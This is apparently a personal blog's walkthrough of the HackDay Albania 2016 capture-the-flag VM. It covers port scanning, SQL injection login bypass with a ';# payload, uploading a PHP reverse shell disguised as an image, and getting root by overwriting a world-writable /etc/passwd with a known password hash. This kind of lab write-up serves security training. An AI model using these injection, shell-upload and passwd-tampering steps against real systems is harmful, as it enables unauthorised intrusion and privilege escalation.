Albania

Information:
Name: HackDay Albania 2016
VM Creator: R-73eN
Time it took me: 10+ hours. I dropped this one in November and picked it back up today. I was having trouble getting into the mysql database because of my shell. However when I tried again, I had no issues.
Rating: 7/10
Recommend: Yep. This VM will help you understand the /etc/passwd file and what linux uses as hashes better. Also good for SQL Injection.

root@kali:~# nmap 10.0.2.6 -A -p 0-9000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HackDay Albania 2016
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8

If you go to robots.txt, you will see 26 disallowed directories. Run wget 10.0.2.6:8008/robots.txt.

I made a little bash script to run through the robots.txt directory.
$ for i in $( < robots.txt); do curl http://192.168.0.5:8008/$i; done;

You will find that a http://192.168.0.5:8008/unisxcudkqjydw/vulnbank/client/login.php exists. There is mysql injection on the page. If you type in ';# you will notice it still submits. We need to find a username first. I will use Burp Suite. Note: we are using the # comment character because the standard -- comment character doesn't work.


Based on the different length, we can assume Jeff is a valid username for this bank. Go back to the login page and enter jeff';# into the username box. That'll log you into the jeff customer page. After upload a php reverse shell with the extension .jpg or .png. Navigate to the /var/www/html/ and find the config.php file. It will look like this:

Your the www-data user. Do a quick python3 -c 'import pty; pty.spawn("/bin/bash");' to get a tty. Lets check out the mysql database.

I try three passwords for taviso. It doesn't work. We can assume taviso has root because he has a .sudo_admin_is_successful in his /home directory. Pretty much everything is barren now. Lets see what files a www-data user (global) I can write to.
Do find / -perm -o+w | grep -v "sys" | grep -v "proc" | grep -v "dev" into the command line. I wish I could find a script/better command. This picks up a lot of nonsense files we don't care about. We find out the /etc/passwd file is world-writable. All we have to do is replace the taviso password and were good to go!

I cat my own /etc/shadow and find out the SHA512 hash correlating to toor is
$6$sgQgqhwa$qJlHD/fD.tjPSINio1LOEASc4I7W5mgi3g7HYgveX.6Sie65N5z56k6KXDytPHe/W83vazu3hLKIuu9pCCy3U0
Replace the taviso line in /etc/passwd to:
taviso:$6$sgQgqhwa$qJlHD/fD.tjPSINio1LOEASc4I7W5mgi3g7HYgveX.6Sie65N5z56k6KXDytPHe/W83vazu3hLKIuu9pCCy3U0:1000:1000:Taviso,,,:/home/taviso:/bin/bash
Do a su - taviso. Password: toor. Or you could ssh taviso@10.0.2.6. Do a sudo -i and congrats your root! Extras: 1. Wondering how to generate Linux passwords? https://unix.stackexchange.com/questions/81240/manually-generate-password-for-etc-shadow. I used openssl passwd -1 password to get the hash $1$KiVu/dJJ$fmcN6KvvZrW9KPxznxJ1A. (includes that period). I tested that for another user and it works perfectly.

Comments

Popular posts from this blog

Palo Alto for GNS3 CCDC Tutorial

Trace Labs Global Missing Persons CTF V

Release of CCDC ISE Manager Website